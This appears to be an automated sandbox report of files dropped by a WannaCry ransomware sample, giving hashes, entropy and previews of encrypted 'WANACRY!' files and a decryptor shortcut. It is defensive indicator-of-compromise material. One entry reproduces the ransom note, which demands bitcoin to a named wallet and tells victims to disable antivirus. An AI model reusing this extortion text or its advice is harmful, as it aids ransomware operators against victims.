                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856462202441563
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIWKF76BttsZ/3BYknKsaEILYIjBnm9QD+SwKXmxYl/gf0C9Ihq+KIP:bkIh6BDsFKUIkozSK2+lof08Ih24
                                                                                      MD5:60DE9735591CBE3ED71CB817652CA359
                                                                                      SHA1:13DFD1466468985E63F124FBEF1063622A733E32
                                                                                      SHA-256:0CEC76AAB8E0B7595562017EC26CDB5CE51CF3292C22811F3AF43DB1A7C46D62
                                                                                      SHA-512:C367C5C076FBE890F1E4ED038DE4D00BEA9C105EEF684FF87494EDEF51E9035709703D8D444D30F8F188B37BF06C531ECC1E0429E626D4D644C4D0A9D3E5409C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......O.H..L1.Gu._..e..Z.%....D.5..>.....Z...e.....?..f;...2.e.^.u.7.._..r...*...p.J.Jz..3.......w.V%!m.....|5..^~q.......oS.*.^F..O..S...j./..\o.w..7...5....].....T+*?..9}..{...u..&..lj.Tz....N.\...m..)..?s.W...h.....=.x.....2x.m.h'...3...A...P2.|................;......<d.....Z.26.k...v..V.^A....z+.V.t{.Yn..o..-...Ub.`.|U.Y.W..........9.'_.S.D....W..c...>1U\.J...).kF.%.&..-....P.O.j....j.c...Q.....mN.o"...\+phH.._Xc.3.r..T.C%.3. {.4D..O....b.w....3..A...g6.=.+.....s/.&4..>....w..A..`S.j.'.h.9..n.VB...~...4.u..Cc.......V.k...<....$...'Fn..v.#....G.E....b.K.!.s.).../.k.'EX ...h.Zu.^[.yJ..~.EY.Q.?..nm...j....i.......b/|.g.......^Q....QH.5.....y..z.<./ts.8..n%....|...&.tH..j...........'.B..`.2.w.......\P..`...-.H_C...Y.d]..`I.......Q.{2.$<. ....8?4]w..^{gD..0_.g..c.l[H.^uQ.>...0...f..E...(.W.Q}.W....T..].....1..Jc...t.....erb4..._. ..XS......w.f~\$........@..F..3.."....vt.).^bq..=m.....B.S......P.-`+.g.l(..%.+.Q.%.....~..r:LK#d\%...^K.r+.!
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.823141525329643
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:F/MluML0rGao1tKl/2r1/qLj0RKHkzcDW4A:F/MtwCaAk+xqj0aAERA
                                                                                      MD5:94F211C59350EB0744CB2F525623E66F
                                                                                      SHA1:27CD11E11008CCAB9F1CE511284557309EB97FE3
                                                                                      SHA-256:05097631544FD2038A82E6206B0BD45654CEE51D5BA6C14AD8AF25F57CB49BE4
                                                                                      SHA-512:7398704F91CDC803270C535C77709794B4CFCF9BE3D61550C2F248C3B539E6AC253C4209609B7068BE7FF7ACFA0F57C678085D9D9790DBD15BDCD68BD4C2F148
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:+|kD.f....D.6)A..z...0."..x.3...Q.hnk8[..@l...Z:.O=..zO.f.=+.OJ..Rc0X+....*...A....# <%.~.(gW.. ...........wG.;.......|..U..p.. .f.b.s.j.z.....k.';..4......g....N....p........p\.r...).Vtl.|\NA.>O..\.r..}Q]s.w...[2Wg.7..H...._0.>..b.v`UY.........{(..f2u.{.....A.y......i2..@..z.jK.0. ..p&....+D*./rZj.Q.....Q..YH~..'..D...6...(t..D...b9;.\o.(..=.!.z^9[....."....H....1.t..Fe.E..\,..D...e{......p....gM.1....2..49z.5...O....U....i.]W.s.h...g.U.M5.......1xqhc......Q6....y....t.e.F..j..!...o6.J.Q..).....6:..._..tL.m`|.~...>g..%.G..].Y...bN?u.:.V!.h.Dn.K....L.0..HKW".V....P..A..D.3.I}...v........$.+3iNH.:k.......a...@W.a~..E.'.F..]E..)b.XsJ.1X\..@.........u.2.dt...N.[.Zn.LZ.6.6..H...W...E.8..kh....:.6]`-NC<....X...h..CYj. .......X....^.l.r..7fw...y.sWV.ui.Q..aQ...f........7.M.5......%.Z.]........1....+Y..TW.Pz:e.>{u.y.qF...Q.(...T.......K..!.,..)!..+%....ob1cd..rG...g..D."4..^z....[8..D.rem.O.n.b..M{.g....sn.<..P.....X?.........B.d....s.....i`-.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826725648880252
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKDjrSvZSMuPwobEz8191HWGfKD/28GzZzLFwp6ajsOPpraPrflDA:bkSsIFwooz839lF1zpSjsOPAfO
                                                                                      MD5:F2D6F57706FA7F3551774489219A34E7
                                                                                      SHA1:638BAD9B26A9DF07504839758B2FD926511085A3
                                                                                      SHA-256:C877FEAEB041692281721D36432ACE80D82DADF526775ACB8091481AD71B05C3
                                                                                      SHA-512:F38E9D3CD0B4B2B68D1EFA8D6BD3D188E825F8CED549710982E7CED6598C74B0C7972E787383FEB18BB043E444BC610B19925EBDE2EB716FB1F7AFD01784DAE9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......Z.Ji...*......#.......l....r..J.....]}/.O...".([q_.nzY.2i.......(.|.1,...8/.`.0|....["E%..._x6Y.,v...D..._.[T.{......v.7.....=.......x....4.KKe(.q..{?).V..[.+..t.K.X.....;..7...-./........s.1E.p.`...CA.u....:..[.G.F...%.`yfw7.9.".,..wl....dAPJ_.+............|..0.......\..icA.7zq..1............V....X -..]Y\6................F..~.}....i.0........T9)pv..S..Wgf...g...K..8..Fi....Cm.d.......=E"....:......ww.......>.._".........W..>.....I.V......gs>r..nq...Y.v..e...K.+.di.........o.Fh.\3.4Oe,.]D)N.eq.wE...#.6.X..P.b.m.."V...U.....Gu).@.zS..n...X9s.Y..^..P\..B.;.....!Q../I.}..........2.b..^..mH.7.....J..T...K....T..L.\skC..&..6.FD.K.....NE... .....Z..............Wo..*t...w%..]+Y...P..'........r.....m...m&...@K...D(%oykY...._...`.A...<.RQ.h..1m@.:.K.J...?. ._......].".......k.r...=./|~s.%G"...u..';A..)...-...iqT.....c.!W.`79..vo1.,.z\A.......I.F`O..R.~...^.....{8m......t...Q..x.7.....Xx.i........R.+ynI...,."....-.....J.h(.!i.c
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826725648880252
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKDjrSvZSMuPwobEz8191HWGfKD/28GzZzLFwp6ajsOPpraPrflDA:bkSsIFwooz839lF1zpSjsOPAfO
                                                                                      MD5:F2D6F57706FA7F3551774489219A34E7
                                                                                      SHA1:638BAD9B26A9DF07504839758B2FD926511085A3
                                                                                      SHA-256:C877FEAEB041692281721D36432ACE80D82DADF526775ACB8091481AD71B05C3
                                                                                      SHA-512:F38E9D3CD0B4B2B68D1EFA8D6BD3D188E825F8CED549710982E7CED6598C74B0C7972E787383FEB18BB043E444BC610B19925EBDE2EB716FB1F7AFD01784DAE9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......Z.Ji...*......#.......l....r..J.....]}/.O...".([q_.nzY.2i.......(.|.1,...8/.`.0|....["E%..._x6Y.,v...D..._.[T.{......v.7.....=.......x....4.KKe(.q..{?).V..[.+..t.K.X.....;..7...-./........s.1E.p.`...CA.u....:..[.G.F...%.`yfw7.9.".,..wl....dAPJ_.+............|..0.......\..icA.7zq..1............V....X -..]Y\6................F..~.}....i.0........T9)pv..S..Wgf...g...K..8..Fi....Cm.d.......=E"....:......ww.......>.._".........W..>.....I.V......gs>r..nq...Y.v..e...K.+.di.........o.Fh.\3.4Oe,.]D)N.eq.wE...#.6.X..P.b.m.."V...U.....Gu).@.zS..n...X9s.Y..^..P\..B.;.....!Q../I.}..........2.b..^..mH.7.....J..T...K....T..L.\skC..&..6.FD.K.....NE... .....Z..............Wo..*t...w%..]+Y...P..'........r.....m...m&...@K...D(%oykY...._...`.A...<.RQ.h..1m@.:.K.J...?. ._......].".......k.r...=./|~s.%G"...u..';A..)...-...iqT.....c.!W.`79..vo1.,.z\A.......I.F`O..R.~...^.....{8m......t...Q..x.7.....Xx.i........R.+ynI...,."....-.....J.h(.!i.c
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.82273988549673
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HfNpWcxrv9fR67GiPDs1BKFQf2ytNcz5Pg0vKHigObpyr:/7WwU7GiyKqOQqP4Cju
                                                                                      MD5:598C5E0E6A59D1AE303D1D493E719DAC
                                                                                      SHA1:AF84416438AF7CE407FF5CB5B7BC18B3375A708E
                                                                                      SHA-256:1FA7A5E179B7C1C681A1CCBD00C5DC794D4E975681B0E5B7B297A7C53FA49702
                                                                                      SHA-512:2B82BA761A8017E87024CE99C642D6317603FF2836E0992C436BD0C932E630799BD37EB820DBF239FDEA8E481D4DF2833D4E11BF04A9B7CC03F2717B8024B1A0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.?g..dX...^....zg{........[....t....T.!.g..2.^.o../w.............e.=...0..?.e@.d.]........a....!.2.Y{..)..~n.w...}..K.{r2._.T#..$p.nA3......>'Sl.......@p..J..bH.P.^|../.;h.[...]].?o..3..\...jzh....3..=y.?._...A1\.>X..t...>pp.'..}W3 P.(ax..\..-iZ..3....S..w.a'.\..$...`T..3....../'.N*0;.0.N.-...x.......FM.5..C..G......!.2..A.B.._Tp.X....O......D..d.A...xR.. ...xq$'..~..j..`.!t.O..F.6...2.M......6.@.n.G...6.....w.W...:....@S....V...z.R..^.Z".`> .A.l.H.~[.......?.7:.GuDQ.A7%^..6...D...rS...E.8...&.;:.#eM.8.B]..A.4(....2......d.~.qE..%.......^G....+...<....(@.4R.2...K.cB3....^...OhtI.E+(.].d..9..v.~_..`.F:y.k.3....GJ.........mR......;BX.X.r..<..w............U..p..3e..d....y.M......4.j1w&.zG*FH.9.H...vt.E....<-<E@U?p..{~x...;.n.....&.p..I....c:?.0....b..'J.+..#..KoY.}..{........mO.{.J...)...H.H.r.}}...K(.j@p.]E.q..m~.,q.P.....f...`.k...Z.4/Gw.4}h...v?.v.qj..... .N.'.*.......Y.@.%..;U...-rM[.V._.....V.....P...kY..._xrA.?....).(m..P..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8351262399909745
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkx5PSNw83N35dAwi47tpzDwy0p6W0l3URAHBWvQJ6DyeHlG12sPVh2ZLSo8gd1p:bkbP0p3NJdAwi4r50W3URAhODwVLXoRp
                                                                                      MD5:31A23384841A07C8597C21985F8DEE4B
                                                                                      SHA1:9AD9FD08B877183423ABFCBC7FD48D3A2B7FDFD0
                                                                                      SHA-256:F0AADCE1631A668E5C718EA4C72A2477082E72CDC7BE33F6D054EBB92CC553BF
                                                                                      SHA-512:FAB0F1561B6DCE870A25DFACDD0CF07249B88D44C1EA8A6916D0DC0A0F7F717C82195D5411508DBAB8C322755C38B808CEC69C2293C6F43F6D18715D6B15758B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......j..}......^...7.(........nNP-A....&.-|...z>%q.4.F.?f..b....|..SO/...R.........H{* .G#V.m..D........sC.(...q...HsWL....x;i.........0.bmh.b .......,+l...4...{..O.R...`...9$.*Gt....i..8J.9.p.#...R..?..#.......:....8.gD.pi........JY...s.r.k:.............3vi....&..,i.(*.W.c.!.^...p.1>..+.........jx.....c.o.).Z.K.Ph.^.0....^/0.!2^z9..O..w.^.E..r...:..d.S......#......_.~.i..g%..&......I*L..f.Z..i.Q...N.;.6...<.L..|.......qA......;..u.......R..^.A....^.H\.R..e4.E..bX1..-&.%pX...Y..}F.2.X.q..&h.<D.'kD...........V.1.i.wNqo..jF.1.M..o.K#)y-....A;.q.d.x..7w@.....'..*.D.Q.."..~..y.....F<.n....I..f..=. 4.Y.r.E..S.V..(.(R....>DO..a.H.....o..}..P...OP..I@...G^.+.\K..Hz.4.K.A..*...Q../.?.x.....=p....JU...n..Q.J..w.F~.F...p.T.n..A..:mFU...d.}/..,.b..d.nh....g......$.+Q.P..8>...`.S.......;..q1.J0R,V....\....m.......N.7.oF...b.y......K.3..fB.8.b.Gy_.Xz...}I7.(.3|.....Y...\..d...v.{xo.Tlx.H.I..b....x..X.........i4q.......8.[l....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8351262399909745
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkx5PSNw83N35dAwi47tpzDwy0p6W0l3URAHBWvQJ6DyeHlG12sPVh2ZLSo8gd1p:bkbP0p3NJdAwi4r50W3URAhODwVLXoRp
                                                                                      MD5:31A23384841A07C8597C21985F8DEE4B
                                                                                      SHA1:9AD9FD08B877183423ABFCBC7FD48D3A2B7FDFD0
                                                                                      SHA-256:F0AADCE1631A668E5C718EA4C72A2477082E72CDC7BE33F6D054EBB92CC553BF
                                                                                      SHA-512:FAB0F1561B6DCE870A25DFACDD0CF07249B88D44C1EA8A6916D0DC0A0F7F717C82195D5411508DBAB8C322755C38B808CEC69C2293C6F43F6D18715D6B15758B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......j..}......^...7.(........nNP-A....&.-|...z>%q.4.F.?f..b....|..SO/...R.........H{* .G#V.m..D........sC.(...q...HsWL....x;i.........0.bmh.b .......,+l...4...{..O.R...`...9$.*Gt....i..8J.9.p.#...R..?..#.......:....8.gD.pi........JY...s.r.k:.............3vi....&..,i.(*.W.c.!.^...p.1>..+.........jx.....c.o.).Z.K.Ph.^.0....^/0.!2^z9..O..w.^.E..r...:..d.S......#......_.~.i..g%..&......I*L..f.Z..i.Q...N.;.6...<.L..|.......qA......;..u.......R..^.A....^.H\.R..e4.E..bX1..-&.%pX...Y..}F.2.X.q..&h.<D.'kD...........V.1.i.wNqo..jF.1.M..o.K#)y-....A;.q.d.x..7w@.....'..*.D.Q.."..~..y.....F<.n....I..f..=. 4.Y.r.E..S.V..(.(R....>DO..a.H.....o..}..P...OP..I@...G^.+.\K..Hz.4.K.A..*...Q../.?.x.....=p....JU...n..Q.J..w.F~.F...p.T.n..A..:mFU...d.}/..,.b..d.nh....g......$.+Q.P..8>...`.S.......;..q1.J0R,V....\....m.......N.7.oF...b.y......K.3..fB.8.b.Gy_.Xz...}I7.(.3|.....Y...\..d...v.{xo.Tlx.H.I..b....x..X.........i4q.......8.[l....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.842917779275005
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:nSW4eIOQlI2A3Dz4iYJsDv1eOBMZ9sBxi5w17jUkzuBhPCq7nEfF9j69hFKzTggI:SWRQ65wviDteaM617o6oXu/grLNlc+
                                                                                      MD5:F8BDA750877B715854921671A1B1BC57
                                                                                      SHA1:23B64A633982476910D33F9F174A43F23B1EBF40
                                                                                      SHA-256:8C562E83586D24A26065EB5BEC9A336CA3E3F5E5AE7DFA0943E99FFFF1E2C779
                                                                                      SHA-512:E2F5868F85FDD3F07DD9354E7EA06A9078D9B85DF69B4A62C25A4588484642D2E7CD209145AEB77139051DBC5D5B83BFD2778374F11355E92E4D6058D8B57464
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:'n...bG.}~....B....._.I.[...x|.1)%.....~..\."va....=.p.JPd...p...S9......<.Gr....f...o......E.6.h1...s@.8..xw..@................+...s.jA...zE.p..U@kxS.Q....>.7..,....+Y.78Q.@.1./N:....:. .m.f0.+.s.....&.c..N..3R.k..|g....x6]LsW...O..8*...[.9.D.$........h......{.'b(..Q@:n..UI..V...zA/....!:*..-...Ec...-..G..z..-.U...=.^8i.....T.P`%....|g.5..S...k...dn'.'.|D+=J..B....l..H.A2.;lh.....;..W.N8..?...+....Z.\.F. .4.u.hL...1C!@%......9....(.Z.qiR._..R...=.9.r...D.dAH.:..#?Q9D.6OY.$.Z..x=......z........;..o.....K..nh..|8z.ql.{@Ryy.......7.+..G..X..1|..qul9Fz..^H.m.Uw.....9*rY....Q..#.,v2......#.d@X..v.....>`I.e.........M...i!.....{&~>*.....U#..Q...t...+H.{..B...., .c..j.ZapDt.......K..o..y.m....1...h....=.l../..9.}.9r....+..R6.E.2.n...Z.6...<..c.F.<...R0T.L.K. .z.X.....b...%...!/..Z....!.Xc<..V.b..V....0.Q......s.a..J-.X.'...R...V...V.~[..]H."9.u.tB/.2......pC.....].UV.\....8..._..../....:.H....f. ...A3.M.P....R3q......;;.....)G$.;&..:L.g....f$.X
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.817976952283648
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk1xEF9DuDH8NbABhH/JIZjzC5xO/FeYUrxNxARZdc3gs:bkVbK0PvxseLRARZyD
                                                                                      MD5:E08EBAF47AC245837FBBA51D2801D62A
                                                                                      SHA1:66D05DD6E6A74A51643C7C72896F307D9A487F1D
                                                                                      SHA-256:0D5EB6B03E5DCC4A5FD1725834D3661F91B25FD125202A4D7BFCF9E3E07BEA86
                                                                                      SHA-512:5C90A911D0D2C363696097254D1EB7CCCB14FEB6629C9E359BD200C53087B8DCFD42CA0703A55CAFEFB4D7C66067B193FB8A59445E8A63EAFE1AB21E7B55D137
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....q."......[v#C..<c.Nw.Q.a...W.8...3..L$.....=/.....o<;.,...h.7...R.a..R#!.,....i.g..[.(3aO...o...".....5........^k..e.(g.FA..{...4d.3M../...p=r.a....#..s.,....h.P.Z.p.}w...m.."i...?.#A.VlfO...!&..F._...@.y...HV&....H.Y.5...R...Y./.....c..KbL...............x..{.|..Z....d...F..M.Xy.DB.rRTv.PQz.......bG=P......&.$v..A..R.4..wx....~..)..[K..>.1I.}X....F..A....r.Xf."..y..b..h......6*cP...2~t-.2!....c.$.4...._.'w ..M..#..y...d..G...Q..x.. .b..-..Y.......3'Ih.h.X"..&.e.xQ~}....b........[\..x...P.j...(.......>..f%5F...........%m....&H..f.c.P...#.....F.....&=~o..Xi.A..r.9!....9..Lt......Zq.t_Y3.....#.2AI..F.N...R...P.....Z 9*..........."../.6.......K.Fb..@,......t.-.N..^.Be.....Qc.a..tq...R.>....|V..I{...b.!.<...9.Q...)#..p..'...M.....P@...h..;5)..B.M.Am.t"j.u...<...."9.8(..g.C.3t`.@H..|H.p.K...Yx,?M.x,...........yKQf.b..3...w.....,{.6...%......P6..q3.Z..a..}...\...$....ab@...ie.v...lZ.v.C...-..!UD.uv.8.u..Y.I.$!...H.....Yih..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.817976952283648
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk1xEF9DuDH8NbABhH/JIZjzC5xO/FeYUrxNxARZdc3gs:bkVbK0PvxseLRARZyD
                                                                                      MD5:E08EBAF47AC245837FBBA51D2801D62A
                                                                                      SHA1:66D05DD6E6A74A51643C7C72896F307D9A487F1D
                                                                                      SHA-256:0D5EB6B03E5DCC4A5FD1725834D3661F91B25FD125202A4D7BFCF9E3E07BEA86
                                                                                      SHA-512:5C90A911D0D2C363696097254D1EB7CCCB14FEB6629C9E359BD200C53087B8DCFD42CA0703A55CAFEFB4D7C66067B193FB8A59445E8A63EAFE1AB21E7B55D137
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....q."......[v#C..<c.Nw.Q.a...W.8...3..L$.....=/.....o<;.,...h.7...R.a..R#!.,....i.g..[.(3aO...o...".....5........^k..e.(g.FA..{...4d.3M../...p=r.a....#..s.,....h.P.Z.p.}w...m.."i...?.#A.VlfO...!&..F._...@.y...HV&....H.Y.5...R...Y./.....c..KbL...............x..{.|..Z....d...F..M.Xy.DB.rRTv.PQz.......bG=P......&.$v..A..R.4..wx....~..)..[K..>.1I.}X....F..A....r.Xf."..y..b..h......6*cP...2~t-.2!....c.$.4...._.'w ..M..#..y...d..G...Q..x.. .b..-..Y.......3'Ih.h.X"..&.e.xQ~}....b........[\..x...P.j...(.......>..f%5F...........%m....&H..f.c.P...#.....F.....&=~o..Xi.A..r.9!....9..Lt......Zq.t_Y3.....#.2AI..F.N...R...P.....Z 9*..........."../.6.......K.Fb..@,......t.-.N..^.Be.....Qc.a..tq...R.>....|V..I{...b.!.<...9.Q...)#..p..'...M.....P@...h..;5)..B.M.Am.t"j.u...<...."9.8(..g.C.3t`.@H..|H.p.K...Yx,?M.x,...........yKQf.b..3...w.....,{.6...%......P6..q3.Z..a..}...\...$....ab@...ie.v...lZ.v.C...-..!UD.uv.8.u..Y.I.$!...H.....Yih..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.783992611540989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XCng9kw+2a9JKF6DzcAyd4JPyzStTx0fjTnzTWhMC2:+Q29JbA3MPMSonzToMC2
                                                                                      MD5:B1B7E3A23C5306D30FAAF0DA353D01B0
                                                                                      SHA1:A1FD8B82A303DF8F4B4837791737BC39B08C269F
                                                                                      SHA-256:173D7256A9F466B918A6345150E603BA2D42E981F7365C985532D6A0D0E6A9E5
                                                                                      SHA-512:15FFB1383FAB960256C4E4722137E206571A7ECBAD5754CD76BBB34223660048040AE6C0A19342A59E77DB03A020E7D490E3D8B7E860F9D702BF7C0121A1731C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:+.~f|.@..".>3...$...7.,A...y:...C=....~....4..pz.cm0pG..bK....O!.p.*..uq.n.w..._.ss..gW.IE...^...t]L.....f.....`$.C..=6[...x8..{.K."....q.C....b6-.1.\...........]...hmm.j%....^...(....#......A..xk..EP.....l\.HK...sv.I!......<..V..2.!...V.2...!.u......U.).4tY..V .B!..V.u7...ev9.....v......5..(.F..7..zB"..U..%HfS.z.l;0..e.w.].m..;u......D.w.^%6.$B&q.s...{../..^H..r.......r...|.......Ga..;.J..l..AX)7.5wES.!q.7.......!.....<.`.U...N.(g.hy....(._.{j)=..iu...Z....J\_..d.T.\.3..SL...(vS...v....&#....g.y..s..#..._.p.V.0.1.....hI.g......{^.$2..3.....3$8.qn.Q...;Jn.nu...!. x.....a..73..@../`:.....z....f..e......1......u.3.2.R.Rd!.....\.1mv.\[...>..!.y..9B.X..^..>{..*..iU.G2..sJ..Z...7\.l+...`...P.n..S.S6.....gsN.......MV(..8..g.cf?./.d.d.......NVV.t..K-E{.........v.Z....s$........R*.V....O..`...>y.+!..4.+.......?.a...0X.K`...Z.8&.H.........^.W.@..(T%IIh.0."E.].V.1....G....,...ry..wi.(N......h....t..JZ.z[..:...0.?..D.....3...E..O..|..V.S..............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.833102779247918
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvD5dJHNpviNQ7briDGNI+DBxiHn3HclIVhLU+BacrccyfVPuIHMV:bkvD5dJHbvoQAmlDByHc6Vh4+xrccSHe
                                                                                      MD5:C88F5132D01753C32C1C736CDE3523C1
